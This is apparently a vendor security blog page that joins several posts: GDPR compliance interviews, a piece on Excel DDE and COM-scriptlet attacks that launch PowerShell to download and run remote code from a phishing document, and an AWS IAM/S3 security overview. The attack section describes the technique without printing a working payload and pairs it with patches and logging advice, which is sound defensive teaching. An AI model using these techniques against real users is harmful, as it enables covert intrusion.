With the Facebook hearings just about over, it appears that Congress may legislate at a national level, at least in terms of data privacy. There are many proposed breach notification and data protections laws also kicking around Congress. A much-needed national law may be on the horizon as well.

The data security legal winds are changing! Why wait to be taken by surprise at a later date?

You can start preparing by reviewing existing security plans and procedures, paying particular attention to incident or breach response.  In particular, to support NY’s breach rule requiring notification on unauthorized access to PII, you’ll need to be able to classify your file system data, and then alert IT security when specific types of sensitve file data are accessed in an usual way.

Not everyone, ahem, can do this!

You’ll also find that the Varonis site to be an incredibly rich resource for data security wisdom. We have many posts and white papers on existing standards and their controls — PCI DSS, NIST 800 family, SANS Critical Security Controls (CSC) — that will provide ideas and inspiration for meeting New York’s new rules.

And we explain how Varonis can help with our DatAdvantage, DatAlert, and DataPrivilege products.

Need to know more? Click here to request a free risk assessment today!

What Experts Are Saying About GDPR

What Experts Are Saying About GDPR

You did get the the memo that GDPR goes into effect next month?

Good! This new EU regulation has a few nuances and uncertainties that will generate more questions than answers over the coming months. Fortunately, we’ve spoken to many attorneys with deep expertise in GDPR. To help you untangle GDPR, the IOS staff reviewed the old transcripts of our conversations, and pulled out a few nuggets that we think will help you get ready.

Does the GDPR cover US businesses? Is the 72-hour breach notification rule strict? Do you need a DPO?  We have the answers below!  If you have more time, listen to our podcasts for deeper insights.

Privacy By Design Raised the Bar

Inside Out Security: Tell us about GDPR, and its implications on Privacy by Design.

Dr. Ann Cavoukian: For the first time, right now the EU has the General Data Protection Regulation, which passed for the first time, ever. It has the words, the actual words, “Privacy by Design” and “Privacy as the default” in the stature.

What I tell people everywhere that I go to speak is that if you follow the principles of Privacy by Design, which in itself raised the bar dramatically from most legislation, you will virtually be assured of complying with your regulations, whatever jurisdiction you’re in.

Because you’re following the highest level of protection. So that’s another attractive feature about Privacy by Design is it offers such a high level of protection that you’re virtually assured of regulatory compliance, whatever jurisdiction you’re in.


Leave a review for our podcast & we'll send you a pack of infosec cards.

US Businesses Also Need To Prepare for GDPR

Inside Out Security: What are some of the concerns you’re hearing from your clients on GDPR?

Sue Foster: When I speak to my U.S. clients, if they’re a non-resident company that promotes goods or services in the EU, including free services like a free app, for example, they’ll be subject to the GDPR. That’s very clear.

Also, if a non-resident company is monitoring the behavior of people who are located in the EU, including tracking and profiling people based on their internet or device usage, or making automated decisions about people based on their personal data, the company is subject to the GDPR.


Leave a review for our podcast & we'll send you a pack of infosec cards.

Is the 72-hour rule as strict as it sounds?

Inside Out Security:  What we’re hearing from our customers is that the 72-hour breach rule for reporting is a concern. And our customers are confused and after looking at some of the fine print, we are as well!! So I’m wondering if you could explain the breach reporting in terms of thresholds, what needs to happen before a report is made to the DBA’s and consumers?

Sue Foster: So you have to report the breach to the Data Protection Authority as soon as possible, and where feasible, no later than 72 hours after becoming aware of the breach.

How do I know if a breach is likely to ‘result in a risk to the rights and freedoms of natural persons’?

There is actually a document you can look at to tell you what these rights and freedoms are. But you can think of it basically in common sense terms. Are the person’s privacy rights affected, are their rights and the integrity of their communications affected, or is their property affected?

If you decide that you’re not going to report after you go through this full analysis and the DPA disagrees with you, now you’re running the risk of a fine to 2% of the group’s global turnover …or gross revenue around the world.

But for now, and I think for the foreseeable future, it’s going to be about showing your work, making sure you’ve engaged, and that you’ve documented your engagement, so that if something does go wrong, at least you can show what you did.


Leave a review for our podcast & we'll send you a pack of infosec cards.

What To Do When You Discover A Breach

Inside Out Security: What are one the most important things you would do when you discover a breach? I mean if you could prioritize it in any way. How would you advise a customer about how to have a breach response program in a GDPR context?

Sheila FitzPatrick: Yeah. Well first and foremost, you do need to have in place, before a breach even occurs, an incident response team that’s not made up of just the IT. Because normally organizations have an IT focus. You need to have a response team that includes IT, your chief privacy officer. And if the person… normally a CPO would sit in legal. If he doesn’t sit in legally, you want a legal representative in there as well. You need someone from PR, communications that can actually be the public-facing voice for the company. You need to have someone within Finance and Risk Management that sits on there.

So the first thing to do is to make sure you have that group in place that goes into action immediately. Secondly, you need to determine what data has potentially been breached, even if it hasn’t. Because under GDPR, it’s not… previously it’s been if there’s definitely been a breach that can harm an individual. The definition is if it’s likely to affect an individual. That’s totally different than if the individual could be harmed. So you need to determine okay, what data has been breached, and does it impact an individual?

So, as opposed to if company-related information was breached, there’s a different process you go through. Individual employee or customer data has been breached, the individual, is it likely to affect them? So that’s pretty much anything. That’s a very broad definition. If someone gets a hold of their email address, yes, that could affect them. Someone could email them who is not authorized to email them.

So, you have to launch into that investigation right away and then classify the data that has been any intrusion into the data, what that data is classified as.

Is it personal data?

Is it personal sensitive data?

And then rank it based on is it likely to affect an individual?

Is it likely to impact an individual? Is it likely to harm an individual?

So there could be three levels.

Based on that, what kind of notification? So if it’s likely to affect or impact an individual, you would have to let them know. If it’s likely to harm an individual, you absolutely have to let them know and the data protection authorities know.


Leave a review for our podcast & we'll send you a pack of infosec cards.

Do we need to hire a DPO?

Inside Out Security: An organization must appoint a data protection officer (“DPO”) if, among other things, “the core activities” of the organization require “regular and systematic monitoring of data subjects on a large scale.”  Many Varonis customers are in the B2B space, where they do not directly market to consumers. Their customer lists are perhaps in the tens of thousands of recipients up to the lower six-figure range. First, does the GDPR apply to personal data collected from individuals in a B2B context? And second, how when does data processing become sufficiency “large scale” to require the appointment of a DPO?

Bret Cohen and Sian Rudgard with Hogan Lovells: Yes, the GDPR applies to personal data collected from individuals in a B2B context (e.g., business contacts).  The GDPR’s DPO requirement, however, is not invoked through the maintenance of customer databases.

The DPO requirement is triggered when the core activities of an organization involve regular and systematic monitoring of data subjects on a large scale, or the core activities consist of large scale processing of special categories of data (which includes data relating to health, sex life or sexual orientation, racial or ethnic origin, political opinions, religious or philosophical beliefs, trade union membership, or biometric or genetic data).

“Monitoring” requires an ongoing tracking of the behaviors, personal characteristics, or movements of individuals, such that the controller can ascertain additional details about those individuals that it would not have known through the discrete collection of information.

Therefore, from what we understand of Varonis’ customers’ activities, it is unlikely that a DPO will be required, although this is another area on which we can expect to see guidance from the DPAs, particularly in the European Member States where having a DPO is an existing requirement (such as Germany).

Whether or not a company is required to appoint a DPO, if the company will be subject to the GDPR, it will still need to be able to comply with the “Accountability” record-keeping requirements of the Regulation and demonstrate how it meets the required standards. This will involve designating a responsible person or team to put in place and maintain appropriate  policies and procedures , including data privacy training programs.


Adventures in Malware-Free Hacking, Part V

Adventures in Malware-Free Hacking, Part V

In this series of post, we’ve been exploring attack techniques that involve minimal efforts on the part of hackers. With the lazy code-free approach I introduced last time, it’s even possible to slip in a teeny payload into a DDE field within Microsoft Word. And by opening the document attached to a phish mail, the unwary user lets the attacker gain a foothold on her laptop. To bring the story up to date, Microsoft ultimately closed the door on DDE attacks with a security patch late last year.

The patch adds a registry entry that disables DDE functionality within Word by default. If you still absolutely need this capability, you’re free to update the setting to bring the old DDE capabilities back to the way it was.

However, the original patch only covered Microsoft Word. Are there DDE capabilities in other Microsoft Office products than can be exploited in code-free style?

Yes, indeed. You can also find them in Excel.

Night of the Living DDE

Before you start shouting into your browser, I’m aware that I left you on the edge of your seat in the previous post describing COM scriptlets. I’ll get to them further below.

Let’s continue with the evil side of DDE, the Excel version.

Just as with Word, Excel’s somewhat hidden DDE capabilities allow you to execute a bit of shell code without breaking a sweat. As a long-suffering Word user, I was familiar with fields and knew a little about DDE functions.

In Excel, I was a little surprised to learn I can execute a command shell from within a cell, as demonstrated in the following:

Did you know you can do this? I didn’t.

This ability to run a Windows shell comes to us courtesy of DDE. (And yes there are other apps to which you can connect using Excel’s embedded DDE features.)

Are you thinking what I’m thinking?

Have the cmd shell in the cell launch a PowerShell session that then downloads and executes a remote string — the trick we’ve been using all along. Like I did below:

You can insert a little PowerScript to download and execute remote code within Excel. Stealthy! 

You would, of course, need to explicitly enter the cell to execute this Excel formula.

So how could a hacker force this DDE command to be executed?

When the worksheet is opened, and if not otherwise configured, Excel will try to refresh these DDE links. There have long been options — buried in Trust Center — to either disable or prompt on updating links to external data sources or other workbooks.

Even without the recent patches, you can disable automatic updates of data connections or DDE links. 

Microsoft initially advised companies last year to disable automatic updates to prevent this DDE-based hack from being so easily pulled off in Excel.

These were mitigations, of course, but Microsoft was reluctant to go the same route as they did for Word, which was to provide a registry entry that would disable DDE all together.

But in January, they bit the bullet and provided patches for Excel 2007, 2010, and 2013 that also turn off DDE by default. This article (h/t Computerworld) nicely covers the details of the patch.

Let’s Go to the Event Logs

In short, Microsoft has cut the power on DDE for MS Word and Excel — if you’ve incorporated their patches —  finally deciding that DDE is more like a bug than, clearing throat, a feature.

If you’ve not, for whatever reason, included these patches in your environment, then you can still reduce the risk of a DDE-based attack by disabling automatic updates or enabling the options that prompt users to refresh links when the document or spreadsheets are opened.

And now an important question: if you’re a victim of this style of attack, would the PowerShell sessions launched by, either fields in Word or a shell command in the Excel cell, show up in the log?

Q:Are PowerShell sessions launched through DDE logged? A:Yes.

In my obfuscation series, I discussed how PowerShell logging has been greatly improved in recent versions of Windows. So I took a peek at the log (above), and can confirm that even when you’re launching PowerShell sessions directly from a cell function —rather than as a macro — Windows will log the event.

I’m not saying it would be easy for IT security to connect all the dots between the PowerShell session, an Excel document, and a phish mail and decide that this is indeed the beginning of the attack. I’ll discuss the consequences of malware-free hacking techniques in my final post in this never-ending series.

Enter the COM Scriptlet

In the previous post, I took on the subject of COM scriptlets. On their own, they are, I suppose, a neat feature that allows you to pass around code, say, JScript, as just another COM object.

But then hackers discovered scriptlets, and at a minimum, it allows them to keep a very low profile on a victim’s computer — “living off the land”.  This Derbycon video demos a few resident Windows tools that take remote scriptlets as arguments — regsrv32, rundll32 — and let hackers essentially conduct their attack malware-free. As I showed last time, you can easily launch PowerShell commands using a JScript-based scriptlet.

As it turns out, a very smart security researcher discovered a way to run a COM scriptlet within an Excel document. He found that something called Package is inserted into an Excel cell formula when you try to link to a document or graphic. And Package will accept a remote scriptlet (below).

Yikes, another stealthy code-free technique to launch a shell using COM scriptlets.

After doing low-level code inspection, the researcher learned that this is actually a bug in the Package software. It wasn’t meant to instantiate a COM scriptlet, just file objects.

I’m not sure whether there’s a patch for this yet. In my own exploration in a virtual Amazon WorkSpaces desktop with Office 2010, I was able to reproduce his results. When I tried again the other day, I had no success.

As we finish up this series, I hope I left you with the feeling that there’s a lot of uncertainty in what hackers can do in your environment. Even if you accept all the recent Microsoft Office patches, they still have relatively low-effort techniques, through the VBA macros I initially presented, to embed a malware payload into Word or Excel.

And if you’ve not done your patch homework, you’ve made it even easier for them to gain a foothold with code-free hacking and then perform stealthy post-exploitation.

I’ll talk about what this all means for mounting a reasonable security defense in — I promise — my final post in this saga.

Continue reading the next post in "Malware-Free Hacking"

Day Tripping in the Amazon AWS Cloud, Part I: Security Overview

Day Tripping in the Amazon AWS Cloud, Part I: Security Overview

I’ve been an occasional user of “the cloud”, a result of working out some data security ideas and threat scenarios in the Amazon EC2 environment. I played at being a system admin while setting up a domain with a few servers, and configuring Active Directory on a controller. My focus was on having a Windows environment that I could do some pen testing. But there’s more to Amazon Web Services (AWS) than EC2 computing environments, and I decided it’s the right time to started exploring more of its services, especially from a security perspective.

There’s No “There” In the Cloud

It’s natural for many in IT (and corporate bloggers with IT backgrounds) to gravitate to EC2. It’s basically a virtual IT facility: Windows operating systems available on different virtual hardware, a virtual network where you don’t have to deal with cables or routers, virtual firewalls, and other network security features.

However, the cloud is more than just a recreation of the IT server room! They call it Amazon Web Services for a reason: Amazon offers computing and storage services removed from their familiar settings.

Get your AWS Services, AWS Services! Lots of choices from the AWS console.

Need just a cloud file system for sharing and working with documents? There’s Amazon WorkDocs.

What if you just want a Windows desktop environment for your small- or mid-size company without having to deal with all the messy server infrastructure? Amazon WorkSpaces is just for you.

Going a step further, what if you just need enormous amounts of raw storage for web applications, and you don’t really care that it’s not organized as a Windows file system.  For that, there’s Amazon S3 buckets.

Need access to an Active Directory environment? Amazon Directory is just the ticket.

In a way the Amazon cloud — and others have similar offerings — is really a collection of separate OS services that are not tied to a specific facility or location: AWS is, of course, accessible everywhere.


The first level of security then is controlling access to these services. For that AWS, has, but what else, an identity and access management system or IAM. It’s called — wait for it— IAM.

When I set up my first AWS account to use EC2, I was given root access and the ability to add new users and groups. You can think of these additional users as power users who can create and modify services in the AWS console. They’re the elite admins of the AWS cloud world.

Users can be organized into groups. And if you’re wondering where the access part of IAM, it’s through something called policies. We wrote a little about these JSON-structured things with respect to S3 buckets.

My IAM crew: adminandy, dangeroudan, sleazysal, and sneakysam.

Just as you can associate a policy with a bucket,  you can do the same with IAM users. I’ll talk about setting policies for AWS console users in the next post, but let’s say that the Amazon policies ain’t very intuitive.

In my scenario, I set up a policy for an IAM group called Restricted, which allows users only read access to the EC2 part of the AWS — in other words, preventing them from launching or stopping Amazon instances. I added two users into the Restricted group: sleazysal and sneakysam.

By the way, there are additional security protections that Amazon provides for AWS users, including multi-factor authentication — currently supporting only special hardware fobs — and separate security credentials that, as we’ll see, can be used to access Amazon services from within computing environment through AWS’s special command line interface or cli.

Next time we’ll learn more about the not very pretty details of policies and something called Amazon resource names or arns, which is the way you refer to just about everything in the Amazon-verse.

Keep in mind that IAM covers users at the level of the AWS console. To set up ordinary users and their permissions, you’ll need to work with plain vanilla directory environments, such as Active Directory, which will examine next time through AWS Directory services.

A completely intuitive access policy for the Restricted user group.

Some Auditing

The AWS console really a portal for admins to launch EC2 instances and other computing environments, set up buckets, create databases, and of course monitor activities.

AWS does support auditing of AWS services and this is done through their CloudTrail service. You can think of it as something like Microsoft’s Event Log, but not nearly as pretty—hard to believe, I know! Further on in this series, we’ll learn about Amazon Athena, which is a tool to help you tame the raw Amazon event logs.

Raw and uncooked: Amazon CloudTrail logs. We’ll use Athena to help organize it.

Bucket Brigade

It’s a good time to look at a service that provides a useful real-world application, S3 buckets. Buckets have obvious use cases in storing huge image files for web applications, but it can store any corporate big-data file.

Or in the scenario I worked out, you can think of buckets as a bare-bones file locker (below).

I’m using buckets to store Word docs that I can share with other IAM users!

However, more appropriate for this type of file sharing activity is the Amazon Workdocs service, which we’ll explore next time.

In any case, with S3 buckets you can configure access control lists for different IAM users. And for more sophisticated permissioning, you can also up more granular policies.

By the way, it’s relatively easy to upload files and other digital objects into the S3 buckets using the Amazon browser interface. There are even third-party apps, one of which I experimented with, that turn this into more of a file locking and sync service.

With some free-ware apps, you can turn S3 buckets into a file sharing service. Btw, you’ll need to borrow a users’ IAM credentials to configure.

What about monitoring and auditing bucket resources?

Amazon does offer a service called Macie, which it describes as “using machine learning to automatically discover, classify, and protect sensitive data in AWS”.

After reviewing Macie, I’d say it’s a data classification service with an alerting function, kind of something like this and this. You could envision, say, some corporate application monthly uploading  huge amounts of transactional data from several different locations into an Amazon S3 bucket. Macie would then monitor the bucket data and let you know who’s accessing it as well as alerting when it finds sensitive PII.

Macie has the ability to let you set regular expressions to discover PII patterns,  and to classify text using static strings — for example, find the word “proprietary” or “confidential” in a document.

I’ll make the point again that Amazon’s built-in tools are not the most informative or easy-to-use. At a minimum, Macie gives you some insights into the Amazon bucket data store.

We’ll see later that it is possible to import S3 bucket objects, using the Amazon command line interface, into a standard Windows environment. And from there, with the right tools, you can do a far better analysis.

Alerts and data classification with Amazon’s Macie.

Let’s take a breath.

We’ve laid out some of the basics of the AWS environment, and looked at a few security and auditing ideas. Next time will take closer look at some of these AWS security tools.

And then we’ll start getting into more of the meat, by examining  practical IT environments — particularly Workspace and Workdocs — and see what Amazon offers in terms of security.

(Spoiler alert: there ain’t much beyond standard Windows functions.)

Till next time!